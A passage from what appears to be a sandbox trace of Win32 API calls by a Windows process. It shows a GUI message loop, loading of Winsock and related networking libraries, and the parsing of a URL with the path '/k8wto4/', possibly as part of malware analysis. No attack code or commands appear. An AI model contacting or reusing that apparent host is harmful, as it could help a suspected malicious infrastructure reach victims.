y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0048.761] SelectObject (hdc=0x20010728, h=0x130a01ce) returned 0x18a002e [0048.761] GetSysColor (nIndex=8) returned 0x0 [0048.761] SetTextColor (hdc=0x20010728, color=0x0) returned 0x0 [0048.761] SelectObject (hdc=0x20010728, h=0x1f3001b7) returned 0x1b00017 [0048.761] SetROP2 (hdc=0x20010728, rop2=13) returned 13 [0048.761] UnrealizeObject (h=0x17100741) returned 1 [0048.761] SelectObject (hdc=0x20010728, h=0x17100741) returned 0x1900010 [0048.761] SetBkColor (hdc=0x20010728, color=0xffffff) returned 0xffffff [0048.761] SetBkMode (hdc=0x20010728, mode=2) returned 2 [0048.761] GetSysColor (nIndex=8) returned 0x0 [0048.761] GetSysColor (nIndex=14) returned 0xffffff [0048.761] DrawThemeTextEx () returned 0x0 [0048.762] SelectObject (hdc=0x20010728, h=0x1b00017) returned 0x1f3001b7 [0048.762] SelectObject (hdc=0x20010728, h=0x1900015) returned 0x17100741 [0048.762] SelectObject (hdc=0x20010728, h=0x18a002e) returned 0x130a01ce [0048.762] GetCurrentPositionEx (in: hdc=0x20010728, lppt=0x68ff15c | out: lppt=0x68ff15c) returned 1 [0048.762] ReleaseDC (hWnd=0x0, hDC=0x20010728) returned 1 [0048.762] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x68ff884) returned 0 [0048.762] GetCursorPos (in: lpPoint=0x68ff844 | out: lpPoint=0x68ff844*(x=1126, y=518)) returned 1 [0048.762] WindowFromPoint (Point=0x466) returned 0x100d0 [0048.762] GetWindowThreadProcessId (in: hWnd=0x100d0, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x4f4 [0048.762] GetCurrentProcessId () returned 0x4f0 [0048.762] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0048.763] GetPropW (hWnd=0x100d0, lpString=0xc031) returned 0x0 [0048.763] GetParent (hWnd=0x100d0) returned 0x100ce [0048.763] GetWindowThreadProcessId (in: hWnd=0x100ce, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x4f4 [0048.763] GetCurrentProcessId () returned 0x4f0 [0048.763] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0048.763] GetPropW (hWnd=0x100ce, lpString=0xc031) returned 0x0 [0048.763] GetParent (hWnd=0x100ce) returned 0x100ca [0048.763] GetWindowThreadProcessId (in: hWnd=0x100ca, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x4f4 [0048.763] GetCurrentProcessId () returned 0x4f0 [0048.763] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0048.763] GetPropW (hWnd=0x100ca, lpString=0xc031) returned 0x0 [0048.763] GetParent (hWnd=0x100ca) returned 0x0 [0048.763] IsWindowVisible (hWnd=0x10166) returned 1 [0048.764] IsWindowEnabled (hWnd=0x10166) returned 1 [0048.764] GetCurrentThreadId () returned 0xc04 [0048.764] ResetEvent (hEvent=0xb2c) returned 1 [0048.764] GetCurrentThreadId () returned 0xc04 [0048.764] GetCurrentThreadId () returned 0xc04 [0048.764] GetCurrentThreadId () returned 0xc04 [0048.764] WaitMessage () returned 1 [0048.806] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x68ff884) returned 1 [0048.806] IsWindowUnicode (hWnd=0x30150) returned 1 [0048.806] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x68ff884) returned 1 [0048.806] GetCapture () returned 0x0 [0048.806] GetWindowThreadProcessId (in: hWnd=0x30150, lpdwProcessId=0x68ff848 | out: lpdwProcessId=0x68ff848) returned 0xc04 [0048.806] GetCurrentProcessId () returned 0x4f0 [0048.806] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0048.806] GetPropW (hWnd=0x30150, lpString=0xc031) returned 0x0 [0048.806] GetParent (hWnd=0x30150) returned 0x0 [0048.806] TranslateMessage (lpMsg=0x68ff884) returned 0 [0048.806] DispatchMessageW (lpMsg=0x68ff884) returned 0x0 [0048.806] GetForegroundWindow () returned 0x100d0 [0048.807] SendMessageW (hWnd=0x100d0, Msg=0xd, wParam=0x100, lParam=0x68ff4f0) returned 0xa [0048.807] GetClassNameW (in: hWnd=0x100d0, lpClassName=0x68ff44e, nMaxCount=256 | out: lpClassName="SysListView32") returned 13 [0048.807] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x68ff884) returned 0 [0048.807] GetCursorPos (in: lpPoint=0x68ff844 | out: lpPoint=0x68ff844*(x=1126, y=518)) returned 1 [0048.807] WindowFromPoint (Point=0x466) returned 0x100d0 [0048.807] GetWindowThreadProcessId (in: hWnd=0x100d0, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x4f4 [0048.807] GetCurrentProcessId () returned 0x4f0 [0048.807] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0048.807] GetPropW (hWnd=0x100d0, lpString=0xc031) returned 0x0 [0048.807] GetParent (hWnd=0x100d0) returned 0x100ce [0048.807] GetWindowThreadProcessId (in: hWnd=0x100ce, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x4f4 [0048.808] GetCurrentProcessId () returned 0x4f0 [0048.808] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0048.808] GetPropW (hWnd=0x100ce, lpString=0xc031) returned 0x0 [0048.808] GetParent (hWnd=0x100ce) returned 0x100ca [0048.808] GetWindowThreadProcessId (in: hWnd=0x100ca, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x4f4 [0048.808] GetCurrentProcessId () returned 0x4f0 [0048.808] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0048.808] GetPropW (hWnd=0x100ca, lpString=0xc031) returned 0x0 [0048.808] GetParent (hWnd=0x100ca) returned 0x0 [0048.808] IsWindowVisible (hWnd=0x10166) returned 1 [0048.808] IsWindowEnabled (hWnd=0x10166) returned 1 [0048.808] GetCurrentThreadId () returned 0xc04 [0048.808] ResetEvent (hEvent=0xb2c) returned 1 [0048.808] GetCurrentThreadId () returned 0xc04 [0048.808] GetCurrentThreadId () returned 0xc04 [0048.808] GetCurrentThreadId () returned 0xc04 [0048.808] WaitMessage () returned 1 [0049.711] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x68ff884) returned 1 [0049.711] IsWindowUnicode (hWnd=0x10164) returned 1 [0049.711] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x68ff884) returned 1 [0049.711] GetCapture () returned 0x0 [0049.711] GetWindowThreadProcessId (in: hWnd=0x10164, lpdwProcessId=0x68ff848 | out: lpdwProcessId=0x68ff848) returned 0xc04 [0049.711] GetCurrentProcessId () returned 0x4f0 [0049.711] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0049.711] GetPropW (hWnd=0x10164, lpString=0xc031) returned 0x0 [0049.711] GetParent (hWnd=0x10164) returned 0x0 [0049.711] TranslateMessage (lpMsg=0x68ff884) returned 0 [0049.711] DispatchMessageW (lpMsg=0x68ff884) returned 0x0 [0049.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68ff505, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0049.712] SetErrorMode (uMode=0x8000) returned 0x1 [0049.712] LoadLibraryW (lpLibFileName="WS2_32.DLL") returned 0x773f0000 [0049.743] SetErrorMode (uMode=0x1) returned 0x8000 [0049.744] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSAStartup", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0049.744] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSAStartup", cchWideChar=10, lpMultiByteStr=0x71ca0fc, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WSAStartup", lpUsedDefaultChar=0x0) returned 10 [0049.744] GetProcAddress (hModule=0x773f0000, lpProcName="WSAStartup") returned 0x773f3ab2 [0049.744] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x68ff426 | out: lpWSAData=0x68ff426) returned 0 [0049.750] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetAddrInfoW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0049.750] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetAddrInfoW", cchWideChar=12, lpMultiByteStr=0x71ca0fc, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetAddrInfoW", lpUsedDefaultChar=0x0) returned 12 [0049.751] GetProcAddress (hModule=0x773f0000, lpProcName="GetAddrInfoW") returned 0x773f4889 [0049.751] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetNameInfoW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0049.751] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetNameInfoW", cchWideChar=12, lpMultiByteStr=0x71ca0fc, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetNameInfoW", lpUsedDefaultChar=0x0) returned 12 [0049.751] GetProcAddress (hModule=0x773f0000, lpProcName="GetNameInfoW") returned 0x773f66af [0049.751] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FreeAddrInfoW", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0049.751] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FreeAddrInfoW", cchWideChar=13, lpMultiByteStr=0x71ca0fc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FreeAddrInfoW", lpUsedDefaultChar=0x0) returned 13 [0049.752] GetProcAddress (hModule=0x773f0000, lpProcName="FreeAddrInfoW") returned 0x773f4b1b [0049.752] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InetPtonW", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0049.752] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InetPtonW", cchWideChar=9, lpMultiByteStr=0x71ca0fc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InetPtonW", lpUsedDefaultChar=0x0) returned 9 [0049.753] GetProcAddress (hModule=0x773f0000, lpProcName="InetPtonW") returned 0x774039dc [0049.753] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InetNtopW", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0049.753] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InetNtopW", cchWideChar=9, lpMultiByteStr=0x71ca0fc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InetNtopW", lpUsedDefaultChar=0x0) returned 9 [0049.753] GetProcAddress (hModule=0x773f0000, lpProcName="InetNtopW") returned 0x77403abf [0049.753] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetAddrInfoExW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0049.753] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetAddrInfoExW", cchWideChar=14, lpMultiByteStr=0x71ca0fc, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetAddrInfoExW", lpUsedDefaultChar=0x0) returned 14 [0049.754] GetProcAddress (hModule=0x773f0000, lpProcName="GetAddrInfoExW") returned 0x773fd1ea [0049.754] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SetAddrInfoExW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0049.754] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SetAddrInfoExW", cchWideChar=14, lpMultiByteStr=0x71ca0fc, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetAddrInfoExW", lpUsedDefaultChar=0x0) returned 14 [0049.754] GetProcAddress (hModule=0x773f0000, lpProcName="SetAddrInfoExW") returned 0x773ff4f6 [0049.754] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FreeAddrInfoExW", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0049.754] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FreeAddrInfoExW", cchWideChar=15, lpMultiByteStr=0x71ca0fc, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FreeAddrInfoExW", lpUsedDefaultChar=0x0) returned 15 [0049.755] GetProcAddress (hModule=0x773f0000, lpProcName="FreeAddrInfoExW") returned 0x773fe14d [0049.755] SetErrorMode (uMode=0x8000) returned 0x1 [0049.755] LoadLibraryW (lpLibFileName="Fwpuclnt.dll") returned 0x721e0000 [0049.760] SetErrorMode (uMode=0x1) returned 0x8000 [0049.760] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSASetSocketPeerTargetName", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0049.760] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSASetSocketPeerTargetName", cchWideChar=26, lpMultiByteStr=0x71e6edc, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WSASetSocketPeerTargetName", lpUsedDefaultChar=0x0) returned 26 [0049.761] GetProcAddress (hModule=0x721e0000, lpProcName="WSASetSocketPeerTargetName") returned 0x721fbb1e [0049.761] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSADeleteSocketPeerTargetName", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0049.761] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSADeleteSocketPeerTargetName", cchWideChar=29, lpMultiByteStr=0x71e6edc, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WSADeleteSocketPeerTargetName", lpUsedDefaultChar=0x0) returned 29 [0049.761] GetProcAddress (hModule=0x721e0000, lpProcName="WSADeleteSocketPeerTargetName") returned 0x721fbb4e [0049.761] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSAImpersonateSocketPeer", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0049.761] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSAImpersonateSocketPeer", cchWideChar=24, lpMultiByteStr=0x71e6edc, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WSAImpersonateSocketPeer", lpUsedDefaultChar=0x0) returned 24 [0049.762] GetProcAddress (hModule=0x721e0000, lpProcName="WSAImpersonateSocketPeer") returned 0x721fbb7e [0049.762] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSAQuerySocketSecurity", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0049.762] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSAQuerySocketSecurity", cchWideChar=22, lpMultiByteStr=0x71dfde4, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WSAQuerySocketSecurity", lpUsedDefaultChar=0x0) returned 22 [0049.762] GetProcAddress (hModule=0x721e0000, lpProcName="WSAQuerySocketSecurity") returned 0x721fbaed [0049.762] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSARevertImpersonation", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0049.763] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSARevertImpersonation", cchWideChar=22, lpMultiByteStr=0x71dfde4, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WSARevertImpersonation", lpUsedDefaultChar=0x0) returned 22 [0049.763] GetProcAddress (hModule=0x721e0000, lpProcName="WSARevertImpersonation") returned 0x721fbcfd [0049.763] SetErrorMode (uMode=0x8000) returned 0x1 [0049.763] LoadLibraryW (lpLibFileName="IdnDL.dll") returned 0x6e0f0000 [0049.787] SetErrorMode (uMode=0x1) returned 0x8000 [0049.787] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="DownlevelGetLocaleScripts", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0049.787] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="DownlevelGetLocaleScripts", cchWideChar=25, lpMultiByteStr=0x71e6edc, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DownlevelGetLocaleScripts", lpUsedDefaultChar=0x0) returned 25 [0049.787] GetProcAddress (hModule=0x6e0f0000, lpProcName="DownlevelGetLocaleScripts") returned 0x6e0f2a5b [0049.787] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="DownlevelGetStringScripts", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0049.787] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="DownlevelGetStringScripts", cchWideChar=25, lpMultiByteStr=0x71e6edc, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DownlevelGetStringScripts", lpUsedDefaultChar=0x0) returned 25 [0049.788] GetProcAddress (hModule=0x6e0f0000, lpProcName="DownlevelGetStringScripts") returned 0x6e0f2b2f [0049.788] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="DownlevelVerifyScripts", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0049.788] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="DownlevelVerifyScripts", cchWideChar=22, lpMultiByteStr=0x71dfde4, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DownlevelVerifyScripts", lpUsedDefaultChar=0x0) returned 22 [0049.788] GetProcAddress (hModule=0x6e0f0000, lpProcName="DownlevelVerifyScripts") returned 0x6e0f2dad [0049.788] SetErrorMode (uMode=0x8000) returned 0x1 [0049.789] LoadLibraryW (lpLibFileName="Normaliz.dll") returned 0x75820000 [0049.789] SetErrorMode (uMode=0x1) returned 0x8000 [0049.789] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IdnToUnicode", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0049.789] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IdnToUnicode", cchWideChar=12, lpMultiByteStr=0x71ca0fc, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IdnToUnicode", lpUsedDefaultChar=0x0) returned 12 [0049.790] GetProcAddress (hModule=0x75820000, lpProcName="IdnToUnicode") returned 0x7599f707 [0049.790] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IdnToNameprepUnicode", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0049.790] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IdnToNameprepUnicode", cchWideChar=20, lpMultiByteStr=0x71dfde4, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IdnToNameprepUnicode", lpUsedDefaultChar=0x0) returned 20 [0049.790] GetProcAddress (hModule=0x75820000, lpProcName="IdnToNameprepUnicode") returned 0x7599f6b4 [0049.790] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IdnToAscii", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0049.790] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IdnToAscii", cchWideChar=10, lpMultiByteStr=0x71ca0fc, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IdnToAscii", lpUsedDefaultChar=0x0) returned 10 [0049.791] GetProcAddress (hModule=0x75820000, lpProcName="IdnToAscii") returned 0x75938bb8 [0049.791] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IsNormalizedString", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0049.791] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IsNormalizedString", cchWideChar=18, lpMultiByteStr=0x71dfde4, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IsNormalizedString", lpUsedDefaultChar=0x0) returned 18 [0049.791] GetProcAddress (hModule=0x75820000, lpProcName="IsNormalizedString") returned 0x7599f662 [0049.791] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="NormalizeString", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0049.791] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="NormalizeString", cchWideChar=15, lpMultiByteStr=0x71ca0fc, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NormalizeString", lpUsedDefaultChar=0x0) returned 15 [0049.792] GetProcAddress (hModule=0x75820000, lpProcName="NormalizeString") returned 0x7599f5ea [0049.792] GetCurrentThreadId () returned 0xc04 [0049.792] GetCurrentThreadId () returned 0xc04 [0049.792] GetCurrentThreadId () returned 0xc04 [0049.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0049.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0049.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0049.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".", cchCount1=1, lpString2="@", cchCount2=1) returned 1 [0049.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0049.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0049.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0049.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0049.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0049.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0049.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0049.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0049.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0049.793] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0049.793] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0049.793] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0049.793] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0049.793] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0049.793] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0049.793] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0049.793] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".", cchCount1=1, lpString2="/", cchCount2=1) returned 1 [0049.793] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0049.793] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0049.793] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0049.793] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0049.793] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="/", cchCount1=1, lpString2="/", cchCount2=1) returned 2 [0049.793] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="/k8wto4/", cchCount1=1, lpString2="/", cchCount2=1) returned 2 [0049.793] CompareStringW 